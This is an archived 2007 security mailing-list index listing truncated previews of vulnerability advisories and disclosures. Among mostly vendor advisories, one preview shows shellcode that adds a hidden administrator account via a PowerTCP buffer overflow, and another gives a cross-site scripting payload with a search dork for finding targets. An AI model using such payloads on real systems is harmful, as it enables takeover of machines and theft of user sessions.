FLEA-2007-0022-1: file

2007-05-24 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0022-1 Published: 2007-05-24 Rating: Moderate Updated Versions: file=/[EMAIL PROTECTED]:devel//1/4.21-1-0.1 group-dist=/foresight.rpath.org at fl:1-devel//1/1.2.2-0.10-3 References: http://cve.mit

iDefense Security Advisory 05.24.07: Apple Computer Mac OS X pppd Plugin Loading Privilege Escalation Vulnerability

2007-05-24 Thread iDefense Labs
Apple Computer Mac OS X pppd Plugin Loading Privilege Escalation Vulnerability iDefense Security Advisory 05.24.07 http://labs.idefense.com/intelligence/vulnerabilities/ May 24, 2007 I. BACKGROUND Apple Mac OS X pppd is a setuid root application that is used to establish and configure connection

n.runs-SA-2007.008 - Avast! Antivirus CAB parsing Arbitrary Code Execution Advisory

2007-05-24 Thread security
n.runs AG http://www.nruns.com/ security(at)nruns.com n.runs-SA-2007.008 24-May-2007 Vendor:ALWI

FLEA-2007-0021-1: madwifi

2007-05-24 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0021-1 Published: 2007-05-24 Rating: Major Updated Versions: madwifi=/[EMAIL PROTECTED]:devel//fl:desktop//[EMAIL PROTECTED]:1-devel//1/0.9.3.1-0.0.1-1 group-dist=/foresight.rpath.org at fl:1-devel//1/1.

Dart Communications PowerTCP Service Control (DartService.dll 3.1.3.3) remote buffer overflow

2007-05-24 Thread retrog
'metasploit one, 456 bytes - cmd /c net user su tzu /add & net localgroup Administrators su /add shellcode = unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%49%49%49%49%49%49%37%49%49%49%49%49%49%49%49%49%49%49%51%5a%6a%44%58%50%30%41%30%41%6b%41%41%54%42%41%32%41%41%32%42%41%30%42%41%58%38%41%42%

WIYS v1.0 Cross-Site Scripting Vulnerability - (05.24.2007) (NEW)

2007-05-24 Thread vagrant - e-hack.org
WIYS v1.0 Cross-Site Scripting Vulnerability - (05.24.2007) (NEW) Vulnerability: http://www.target.com/index.php?Page=Sayfa&No=";>alert(document.cookie) Vulnerable: WIYS v1.0 Google d0rk: Bu site FORSNET tarafından WİYS Yazılımı™ ile hazırlanmıştır. Script : http://www.forsnet.com.tr/yazilim

[SECURITY] [DSA 1297-1] New gforge-plugin-scmcvs packages fix arbitrary shell command execution

2007-05-24 Thread Moritz Muehlenhoff
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1297-1[EMAIL PROTECTED] http://www.debian.org/security/ Moritz Muehlenhoff May 24th, 2007

Vulnerability in Credant Mobile Guardian Shield for Windows

2007-05-24 Thread myucebox
Vulnerability in Credant Mobile Guardian Shield for Windows Vendor: Credant Technologies Inc. http://www.credant.com/ Product: Credant Mobile Guardian Shield for Windows Version: 5.2.1.105 (and prior) Affected Operating Systems: Windows XP SP2 (and likely others) Product Overview: Credant Tec

[OpenPKG-SA-2007.018] OpenPKG Security Advisory (freetype)

2007-05-24 Thread OpenPKG GmbH
1.0.1 OpenPKG CommunityCURRENT freetype-2.3.4-20070524 For security reasons, this document was digitally signed with the OpenPGP public key of the OpenPKG GmbH (public key id 61B7AE34) which you can downl

Re: NOD32 Antivirus Long Path Name Stack Overflow Vulnerabilities

2007-05-24 Thread Ismael Briones
You could use in your shellcode any character allowed as a directory character in Windows. The path name will be then converted to Unicode by Nod32 process. So you have to deal with this too. I used Alpha2 (http://www.edup.tudelft.nl/~bjwever/documentation_alpha2.html.php from Berend-Jan Wever)

[ MDKSA-2007:104-1 ] - Updated samba packages fix multiple vulnerabilities

2007-05-24 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:104-1 http://www.mandriva.com/security/ ___

[ MDKSA-2007:109 ] - Updated tetex packages fix vulnerabilities

2007-05-24 Thread security
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 ___ Mandriva Linux Security Advisory MDKSA-2007:109 http://www.mandriva.com/security/ ___

FLEA-2007-0020-1: freetype

2007-05-24 Thread Foresight Linux Essential Announcement Service
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Foresight Linux Essential Advisory: 2007-0020-1 Published: 2007-05-21 Rating: Moderate Updated Versions: freetype=/[EMAIL PROTECTED]:devel//1//[EMAIL PROTECTED]:1-devel//1/2.3.4-0.0.1 group-dist=/[EMAIL PROTECTED]:1-devel//1/1.2.2-0.9-2 Referen

rPSA-2007-0108-1 freetype

2007-05-24 Thread rPath Update Announcements
rPath Security Advisory: 2007-0108-1 Published: 2007-05-23 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: freetype=/[EMAIL PROTECTED]:devel//1/2.1.10-5.2-1 References: http://cve.mitre.org/cgi-bin/c

Secunia Research: eScan Products Agent Service Command Decryption Buffer Overflow

2007-05-24 Thread Secunia Research
== Secunia Research 23/05/2007 - eScan Products Agent Service Command Decryption Buffer Overflow - == Table of Contents Affected Softwa